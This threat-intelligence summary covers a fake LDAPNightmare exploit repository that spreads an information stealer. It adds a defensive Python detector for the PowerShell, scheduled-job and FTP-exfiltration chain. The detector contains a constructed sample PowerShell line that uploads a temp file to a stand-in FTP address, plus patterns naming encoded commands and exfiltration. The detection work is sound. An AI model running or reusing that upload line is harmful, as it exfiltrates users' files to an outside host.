Information Stealer Masquerades as LDAPNightmare (CVE-2024-49113) PoC Exploit
This article discusses a fake proof-of-concept (PoC) exploit for LDAPNightmare (CVE-2024-49113) that is being used to distribute information-stealing malware. The fake PoC lures security researchers into downloading malware disguised as a legitimate exploit. Affected: CVE-2024-49112, CVE-2024-49113

Key points:

  • Two critical LDAP vulnerabilities were patched by Microsoft in December 2024.
  • CVE-2024-49112 allows remote code execution via specially crafted LDAP requests.
  • CVE-2024-49113 is a denial-of-service vulnerability that can crash the LDAP service.
  • A fake PoC exploit for CVE-2024-49113 is being used to distribute information-stealing malware.
  • The malicious repository disguises itself as a legitimate project but contains a harmful executable.
  • Executing the malware drops a PowerShell script that creates a Scheduled Job to run an encoded script.
  • The script collects sensitive information and uploads it to an external FTP server.
  • Best practices for avoiding malware include using trusted repositories and reviewing commit histories.
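As an added, defender-side example (not code from the article or from Trend Micro), the following Python triage routine flags process-creation command lines that match the behaviour chain listed above: a PowerShell script under %LocalAppData%, a Scheduled Job launching an encoded script, and an FTP upload. All command lines, paths and the 203.0.113.5 address are constructed for the example.

```python
import base64
import re
# Constructed detection example, not code from the Trend Micro article. It scores
# process-creation command lines against the chain in the key points above; every
# sample value below is made up.
ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_commands(cmdline):
    """Return the plaintext of every -EncodedCommand argument (base64 of UTF-16LE)."""
    decoded = []
    for b64 in ENC_RE.findall(cmdline):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid PowerShell encoding; skip this argument
    return decoded

def classify_event(cmdline):
    """Return the set of chain stages one command line matches (empty if benign)."""
    stages = set()
    low = cmdline.lower()
    if "powershell" in low and re.search(r'-file\s+"?[^"]*\\appdata\\local\\', low):
        stages.add("dropper_script_in_localappdata")
    if "register-scheduledjob" in low:
        stages.add("scheduled_job")
    plaintexts = decode_encoded_commands(cmdline)
    if plaintexts:
        stages.add("encoded_command")
    if any("ftp://" in p.lower() and "upload" in p.lower() for p in plaintexts):
        stages.add("ftp_exfiltration")
    return stages

def assess_chain(cmdlines):
    """Union the stages over a host's events; three or more is a strong match."""
    seen = set()
    for cmdline in cmdlines:
        seen |= classify_event(cmdline)
    return seen, len(seen) >= 3

# Constructed sample events; 203.0.113.5 is a documentation (TEST-NET-3) address.
SAMPLE_PAYLOAD = ("$c = New-Object Net.WebClient; "
                  "$c.UploadFile('ftp://203.0.113.5/out.txt', $env:TEMP + '\\info.txt')")
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File "C:\Users\u\AppData\Local\update.ps1"',
    'powershell.exe -NoProfile -Command "Register-ScheduledJob -Name Sync '
    '-ScriptBlock { powershell -EncodedCommand ' + SAMPLE_ENC + ' }"',
]
```

Feed it Sysmon event 1 or Windows 4688 command lines per host; a single stage on its own is common in legitimate administration, which is why the verdict requires several stages together.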

MITRE ATT&CK Tactics:

  • TA0002: Execution – The malware executes a PowerShell script to run malicious code.
  • TA0010: Exfiltration – The malware collects and exfiltrates sensitive information via FTP.
  • TA0040: Impact – The exploitation of CVE-2024-49113 can lead to service disruptions.

Indicators of Compromise:

  • [file name] poc.exe
  • [url] pastebin[.]com
  • [other IoC] PowerShell script dropped in %LocalAppData%
  • [other IoC] Scheduled Job created in %Temp%
  • See the full article for the complete list of IoCs.

Full Research: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html